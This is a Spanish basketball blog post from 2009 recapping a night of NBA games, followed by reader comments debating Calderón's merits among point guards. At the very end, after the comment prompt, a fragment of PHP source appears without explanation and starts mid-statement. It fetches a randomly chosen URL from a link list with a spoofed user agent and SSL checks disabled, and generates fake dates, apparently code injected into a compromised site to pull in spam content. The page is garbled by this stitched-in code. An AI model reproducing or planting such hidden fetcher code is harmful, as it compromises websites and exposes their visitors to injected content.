La crónica (31/01/2009)

01 de February de 2009 por Jabho

Acabó el mes de enero y lo hizo con una mala noticia para los seguidores de los Lakers: la rodilla de Andrew Bynum. Tras una entrada a canasta, Kobe se desequilibra y cae sobre la rodilla de su compañero que inmediatamente se retira al vestuario. Habrá que esperar a que se determine el alcance de la lesión pero lo positivo es que no es la misma rodilla que se lesionó el año pasado. Bynum estaba recuperando el nivel que nos asombró el año pasado justo antes de lesionarse.

El partido tenía además el aliciente de ver de nuevo el enfrentamiento de los hermanos Gasol. Ganó Pau en el duelo particular y los Lakers sobre los Grizzlies, que acumulan 12 derrotas seguidas con cambio de entrenador incluído. Los Lakers andan metidos en una gira que tiene su paso por Boston el jueves. De momento han ganado a Wolves y Grizzlies, pero ambos partidos con más dificultades de las esperadas.

Hace un par de días discutíamos quién es el “jefe” de los Nets. Ayer tanto Carter como Harris estaban jugando un mal partido pero en el final igualado fue el base el que se echó el equipo a las espaldas para resolverlo. El partido era contra los Sixers que han recuperado a Elton Brand y con él su irregularidad preguntándose cada día más gente si ambos conceptos no irán de la mano. Había rumores de que incluso estaba en el mercado el bueno de Elton, que no está teniendo suerte este año.

En nuestro partido destacado de la jornada los Spurs vencieron con más facilidad de la esparada a los Hornets, muy a pesar de Paul. Los Spurs, como siempre, un bloque. Los Hornets, como últimamente, CP3, algo de West y poco más. No sería de extrañar que se volvieran a encontrar en primavera en una serie a 7 partidos.

En el resto de la jornada buen partido el que jugaron anoche Rudy y Sergio en la victoria de los Blazers ante los Jazz, que ya empiezan a echar de menos a Boozer. Muchos puntos, esperables, en los equipos de D´Antoni y O´Brien. Ganaron los Knicks, que vuelven a coquetear con los Play Offs, a los Pacers. También con muchos puntos acabó el ex-equipo de D´Antoni, los Suns. Muchos puntos pero derrota ante los Bulls donde 7 de los 9 jugadores que participaron anotaron por encima de 10 puntos.  Extrañísima temporada de Chicago que gana su tercer partido seguido, sigue fuera de puestos de Play Offs y nos deja muchas de arena y alguna de cal.

Victoria cómoda e importante de los Mavericks ante los Heat. Dallas estuvo por encima del 60% en tiro lo que habla bien de ellos y mal de la defensa de los Heat. El duelo de cenicientas se lo llevaron los Wizards ante los Clippers, a pesar de haber recuperado los angelinos a Baron. Por los Clippers el novato Gordon se consolida como la mejor noticia del año. Y duelo de amigos el de Stephen Jackson y sus Warriors ante Artest y sus Rockets que se llevaron los de Houston. Acabamos con la victoria de los Bucks ante los Hawks con un Villanueva en plena forma.

PREMIOS

MVP: Muchas buenas actuaciones que además ayudaron a sus equipos a ganar como la de Roy, Parker, Villanueva, Harrington o incluso Artest. Pero premio anoche para Dirk Nowitzki por sus 30 puntos con 7 rebotes con un excelente 12 de 14 en tiro.

Rookie: Buen partido, muy bueno, de Rose con los Bulls y victoria. También buenas actuaciones en las derrotas de sus respectivos equipos de Gordon, Beasley y Mayo. Pero el mejor de la noche fue Brook Lopez con 24 puntos, 17 rebotes y 4 tapones. Harris acudió a rescatar al equipo al final, pero sin Brook no hubiera habido partido que rescatar.

La sorpresa: Me quedo con otro rookie que no está haciendo una campaña muy regular pero si está dejando muestras de un gran potencial. McGee ayudó a su equipo anoche con 18 puntos y 9 rebotes, con canastas de mucho mérito. Mencionar también los 14 puntos y 17 rebotes del gladiador Pryzbilla.

La decepción: Mal partido de Carter pero su equipo venció, por lo que el premio va para Brand y sus Sixers. Han mejorado y ya son 7º del Este con un balance del 50%, pero esperamos mucho más. Partidos como el de anoche en casa ante los Nets no deberían de dejarlos escapar (y el trajecito que les hizo Lopez para mirárselo)

Mayor esfuerzo en Vano: El de TJ Ford con los Pacers, Barbosa con los Suns,  Deron Williams con los Jazz o Wade con los Heat… todos grandes esfuerzos, aunque el premio va para Chris Paul en la derrota de los Hornets.

Razones para trasnochar

Dos partidos se juegan a hora de tarde de fútbol. Los dos tienen sus motivos para interesarnos especialmente…

Magic@Raptors: En teoría es un duelo muy desequilibrado con los Magic luchando por el liderato de la liga y los Raptors penúltimos del Este. Pero con José los Raptors son más y además la necesidad aprieta por lo que para Toronto cada partido es vital si quieren estar en Play Offs. Un Bosh contra Howard no está nada mal pero además encontramos jugadores en muy buena forma como Nelson, Lewis o Turkoglu por un lado y Bargnani por el otro.

Y el jugador a seguir esta noche es… Al Jefferson. El tiempo y el anilllo verde han dado la razón a Ainge, pero el traspaso de Al Jefferson levantó no pocas ampollas en Boston. Al seguidor Celtic le encantaba Big Al y no se vio claro desde el primer momento que Garnett, a sus años, compensara. Al Jefferson está jugando un gran baloncesto e incluso últimamente su equipo gana. De momento no consigue brillar lo suficiente para estar en el All Star ni ganar lo suficiente como para que su equipo sea de la parte alta de la conferencia pero él juega bien con sus movimientos de pies, sus fintas y su facilidad para el rebote. Dura prueba esta noche ante el que fuera su equipo que se caracteriza por defender muy duro, especialmente en la zona.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Qué gran mañana…
    Atrapado por el tenis, que no sólo de nba vive el hombre. Cualquier duelo Nadal-Federer ha estado a la altura de los más grandes espectáculos deportivos que he tenido la suerte de contemplar en toda mi vida. Qué grandes son, diosss…

    Noticias… lo de Bynum, según fuentes oficiales las primeras exploraciones con rayos-x han dado negativas, aunque próximamente se le realizarán algunas más. En definitiva, que se está hablando que el tema no es grave… quizás un esguince. Seguiremos informando.

    Ayer, olvidé mencionar que Calderón falló un tiro libre. Según él mismo, le importaba tanto el récord después de haber fallado que antes de hacerlo. Es decir, le importaba un carajo.
    Es difícil creer que a alguien le pueda dar igual que su nombre no vaya a quedar escrito en una de esas listas que tanto les gusta hacer a los americanos pero, sinceramente, la trascendencia de un récord de esas características es apenas ninguna, sin pretender quitarle mérito ninguno al asunto. ¿alguien sabe quien tiene el récord aquí en españa?? diría que aquí no se hacen esas listas.
    La trascendencia de Calderón sí es decisiva y se ve en todos los partidos que juega en su equipo. Seguramente su nombre al final sí quedará escrito como el mejor base que ha tenido la franquicia hasta el momento… y tampoco nos debería estrañar nada que al final logre hacer algo importante.
    Yo sólo digo que para mí sí es trascendente y no puedo hacer una lista de 10 bases en toda mi vida que me hayan hecho disfrutar tanto del basket como él lo ha hecho. ¿qué quereis que os diga? eso vale más que un récord de tiros libres consecutivos o el récord de triples de los novatos….

      Citar

  2. xapa_croack dice:
    #2

    Yo no recuerdo exactamente quien tiene el record, pero me suena que mache o lo consiguio o estaba cerca.

      Citar

  3. Viva_Dirk dice:
    #3

    Hombre Deer, a mi Calde me parece un pedazo de base, pero decir que no has visto 10 que te hallan hecho disfrutar mas(salvo que disfrutar sea ganar el oro en el mundial) me parece exagerar mucho:

    – Magic
    – Stockton
    – Payton
    – Kidd
    – Paul
    – Deron
    – Isiah
    – Baron Davis
    – Nash
    – Kevin Johnson
    – Tim Hardaway

    Te pongo uno mas por si quieres quitar alguno.

      Citar

  4. TheDeerHunter dice:
    #4

    A ver… no he dicho que Calderón esté entre los diez mejores bases de la historia. Sólo he dicho que no hay 10 que a mí me hayan hecho disfrutar tanto…

    De tu lista, siendo fiel a ese criterio completamente subjetivo… quitaría por descontado a Tim Hardaway que a mí no me ha dicho ni fú ni fá en su vida, provablemente a Kevin Johnson que tampoco me haya vuelto loco aunque los considero ambos bases capaces… quizá Anfernee cuando jugaba de base en orlando…

    En realidad, quitaría a todos excepto a Magic y seguramente Nash, por el que siento especial debilidad…
    Stockton, Isiah, Kidd, Payton siendo lo grandes que son y respetándolos al máximo… te aseguro que a mí disfrutar lo que se dice disfrutar pues como que ni de coña.

    Paul, Deron, Baron Davis… me gustan mucho y son superiores a Calde en muchísimas facetas… Pero todavía tienen que dar bastante tralla para darme lo que a mí me ha ofrecido Calderón.

      Citar

  5. Viva_Dirk dice:
    #5

    Ah ok, siendo español es normal, pensaba que hacias el comentario como argumento del nivel de Calderón.

      Citar

  6. MagicJohnson32 dice:
    #6

    Un par de cosas que se comentan en la gran crónica del día y que quisiera matizar:
    – No es que Bynum estuviese empezando a mostrar el nivel del año pasado antes de lesionarse; es que lo había superado. La calidad del juego que estaba haciendo ahora era bastante superior a la del año pasado, tanto en defensa como en ataque. El palo es muy gordo. Ah, mañana por la noche se sabrán los resultados.

    – Y no creo que Lakers ganasen a Wolves y Grizz “con más dificultades de las previstas”. Fueron partidos bastante cómodos ambos, y el de ayer además con la dificultad que supuso perder a Bynum.

      Citar

  7. kantonyo dice:
    #7

    Si estoy con Magic, yo vi los dos partidos, y aunque les costaba diferenciarse en el marcador siempre estaban con la cuarta marcha por si acaso. Aunque si es verdad que alguna vez por ese motivo Lakers se han dejado ganar.

      Citar

  8. TheDeerHunter dice:
    #8

    En realidad, Viva… aunque parezca lo contrario la bandera me inclina pero no me define.

    Ayer prefería que ganara Nadal… pero Federer es tan grande y tan noble que igual contra otro español hubiera preferido que ganara él.

    No es exáctamente la bandera, ni qué se gana… sino cómo se gana. Para mí los Gasol, Calderón, Jimenez, Garbajosa, Nadal, Xavi, Cesc… Federer, Nash, Duncan y un largo etc… son más que deportistas. Son modelos de conducta y nadie puede ser más ídolo que eso.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>